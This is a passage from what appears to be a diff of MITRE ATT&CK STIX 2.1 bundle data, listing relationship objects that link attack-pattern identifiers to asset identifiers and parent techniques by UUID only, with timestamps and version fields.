"x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--639148fb-d0a5-4a2f-b6a3-a5ceb83d620b", + "created": "2023-09-29T17:44:55.599Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:44:55.599Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--639eca67-c21e-49d6-ac62-cf5a26ac6f15", + "created": "2020-02-21T20:46:36.944Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63a1ee43-5383-4756-96be-e6ff8b40cbea", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63ad6d3b-e8eb-4cc6-b330-39e351175cd8", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63bf3206-a584-4342-9ed8-ec3cfe96feb4", + "created": "2024-06-26T15:33:12.015Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:33:12.015Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63ccb738-4a9c-4505-bc1c-84071479a3d0", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63ccd53a-e1c3-496b-8918-6bcb44902dbb", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63d16fff-bd57-49b0-8e65-69e5e84102b3", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63df0239-6cc6-4e1a-b530-aeae34c8bff5", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63e0d3ae-3128-435c-b8b7-2109cb2ec5dd", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63e5ab52-2855-4745-9fc7-dad253f813e5", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63f0f919-cba6-4c5c-943e-236a1287df39", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63f1d22a-cdcd-490c-ac04-b2f29ab9c90d", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63f2e27b-2109-4ef0-a904-d277d1899ed5", + "created": "2024-06-26T13:54:38.712Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:54:38.712Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63f863e5-7c00-4474-8e43-bbe8bfb05cc3", + "created": "2023-09-29T16:43:05.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:43:05.495Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64015adf-7947-4f0c-ac37-6cee16438a16", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--640e2a1d-9064-4f88-b369-1bb30985374f", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6438d95c-9a5b-44e6-8543-cb7ca32f0ac0", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--643a882a-f924-4834-900c-88bb99aa8965", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6444e7ac-2454-4eba-bb5c-07c627147736", + "created": "2024-06-26T14:31:00.823Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:31:00.823Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--644b9639-cb87-4d14-a3af-3a6e8688417b", + "created": "2020-02-21T21:15:06.645Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6453a7ee-39b6-4c08-b249-daee760d01f4", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64922c5f-11de-4148-bec1-dcd153be0171", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--649f5c3b-ddf7-4ee4-897f-4d00e66d181f", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64a41d09-b6d2-493b-9024-483c665d4b8f", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64d2cf60-e0eb-41e7-a4c1-66da4d94429d", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64dee2e2-778a-47cc-9493-58d3c1ec8758", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64f6adc2-084b-4ad1-92ab-b621035e5f17", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--64fc9cd8-6a29-491d-b0f2-542f413d90e9", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--651ef47f-7662-4f9d-9695-a9013409d04f", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--652c1e77-cfea-4452-9762-5ba16f874119", + "created": "2023-09-29T17:58:42.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:58:42.002Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--653ad37d-91a8-4f19-9061-fe6c0668bbfb", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--656c655c-33a0-4d34-a3ef-552bb6c36a9d", + "created": "2024-06-26T13:48:06.169Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:48:06.169Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--657d8f77-2637-4807-baa2-17216cbcd55e", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--659b69c7-31f7-4840-89fb-b7a3af1671ed", + "created": "2024-06-27T09:10:16.945Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:10:16.945Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--659bb448-7727-452a-a10e-6e10d5e2a2eb", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65aa5a0d-926c-4b04-9509-f66a99639877", + "created": "2023-09-29T17:41:34.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:41:34.892Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65ab0d8b-23f7-4ad0-ad55-6ab386be12ae", + "created": "2024-06-26T15:31:26.274Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:31:26.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--65cf270c-174f-4733-a755-35e2171a529c", + "created": "2020-01-14T01:28:32.277Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "target_ref": 